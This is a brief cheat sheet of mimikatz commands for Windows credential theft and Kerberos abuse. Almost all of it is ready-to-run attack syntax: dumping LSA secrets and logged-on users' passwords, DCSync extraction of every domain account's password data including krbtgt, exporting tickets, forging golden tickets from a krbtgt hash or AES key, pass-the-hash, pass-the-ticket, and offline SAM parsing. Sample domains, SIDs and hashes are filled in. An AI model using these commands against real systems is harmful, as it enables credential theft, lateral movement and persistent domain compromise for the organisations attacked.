Preface
Everything here runs with administrator rights. Without them, essentially none of the functions work as expected; keep that in mind.
Commands
Commands any local administrator can run (password dumping, privilege check and logging)
lsadump::lsa /inject    dumps the full details of every local account
privilege::debug    enables the debug privilege; it is the first command to run and is mandatory for the rest
log    writes all subsequent output to the file mimikatz.log in the current directory
sekurlsa::logonpasswords    lists the passwords of logged-on users (the most commonly used command)
Commands that require domain controller privileges
lsadump::dcsync /domain:test.com /user:krbtgt    outputs the password data of the specified user
lsadump::dcsync /domain:test.com /all /csv    lists the account password data of every user in the domain, as CSV
Golden ticket related
Query and purge ticket information
kerberos::list    lists all tickets
kerberos::purge    deletes all tickets
sekurlsa::kerberos    lists authenticated Kerberos credentials (rarely used; domain only)
sekurlsa::tickets /export    lists all tickets and exports them to .kirbi files (rarely used; domain only)
Forge tickets
Forge a ticket using the NT hash
kerberos::golden /user:Administrator /domain:test.com /sid:S-1-5-21-4166986646-4168497534-2490551922 /krbtgt:308390d1ca7addf22c84ba9f1d26cbe4 /ticket:1.kirbi
Using the krbtgt NTLM hash:
kerberos::golden /user:Administrator /domain:xxx.xxx.xxx /sid:xxxxxxxxxxxxx /krbtgt:ntlm-hash-value /ticket:test.kirbi
Using the krbtgt AES256 key:
kerberos::golden /domain:xxx.xxx /sid:xxxxxxxxxxx /aes256:xxxxxxxx /user:Administrator /ticket:test.kirbi
Pass-the-hash (pth) attack:
sekurlsa::pth /domain:test.com /user:zhangsan /ntlm:3dbde697d71690a769204beb12283678
lsadump::dcsync /domain:test.com /all /csv
Load a ticket into the cache (pass-the-ticket)
kerberos::ptt 1.kirbi
Parse the SAM hive offline
lsadump::sam /sam:sam.hiv /system:system.hiv
Reference
how to use mimikatz